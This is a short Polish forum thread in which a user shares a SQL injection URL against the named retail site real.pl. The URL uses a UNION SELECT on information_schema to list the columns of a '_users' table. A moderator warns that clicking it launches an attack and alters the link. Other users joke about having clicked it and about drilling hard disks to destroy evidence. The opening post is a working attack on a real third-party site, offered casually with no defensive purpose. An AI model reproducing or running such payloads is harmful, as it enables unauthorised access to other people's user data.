sql injection na real.pl

[michalski007]

zajżyjcie, ciekawy przykład sql injection

ttp://www.real.pl/markety.php?wojewodztwo=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns%20where%20table_name=C HAR(95,117,115,101,114,115)-- tablea _users

[TQM]

UWAGA!

Jesli ten link dziala to kazdy kto na niego kliknie wykonuje atak SQL Injection :-)
Jak myslicie - ile czasu zajmie panom w garniturach lub innych mundurach znalezienie skad przyszlo klikniecie?

@michalski007 - wyedytowalem post lekko zmieniajac URL aby ludzie ktorzy bezmyslnie klikaja mieli szanse sie zastanowic nad tym co robia zanim napytaja sobie biedy...

[michalski007]

tqm , wybacz nie pomyślałem o tym, następnym razem również wyedytuje lekko.

[GSG-9]

troche zapozno tqm
jakby co to ja tylko kliknalem skad mialem wiedziec ze to sql inj

[Uther92]

Może ktoś powie coś więcej, bo ja osobiście ie kliknę

[Squealer]

no to fajnie xD ja kliklem przed zmiana (ciekawe ile mi czasu zostalo )

[northdakota]

Ja też kliknąłem przed:P Zgine?:P
Ktoś wytłumaczy o co tam sie rozchodziło?

[Teeed]

pełen szacun dla programistow z reala

kliknalem, nie robi drop table na szczescie >>>xD

[kosiarz]

panowie to ja juz proponuje brać do reki wiertarki i zaczynać walke z dyskiem
tylko pamiętajcie ze trzeba zrobić dużo dziur żeby nie mozna bylo odzyskać danych
dla bardziej zapobiegawczych proponuje zakupic bilety na jakąś egzotyczna wyspe i na jakis czas wyjechać.

[TQM]

OFF-TOPIC:
Slyszalem ze w naszym wesolym kraju zwanym Polska znowu jakas afera... ze ponoc jeden taki sprytny cos chcial dane zniszczyc i mu sie nie bardzo udalo szkoda tylko ze nie wiem o co chodzi do konca, ale zrywalem boki jak mi dzisiaj rodzinka telefonicznie relacjonowala :P

Ci ktorzy ogladaja telewizje powinni juz wiedziec ze mlotek sie nie sprawdza... no chyba ze taki duuuuzy (taki sie sprawdza - wiem - sam testowalem!), wiec wiertarka moze miec wieksze szanse

Sorki ale nie moglem sie powstrzymac :P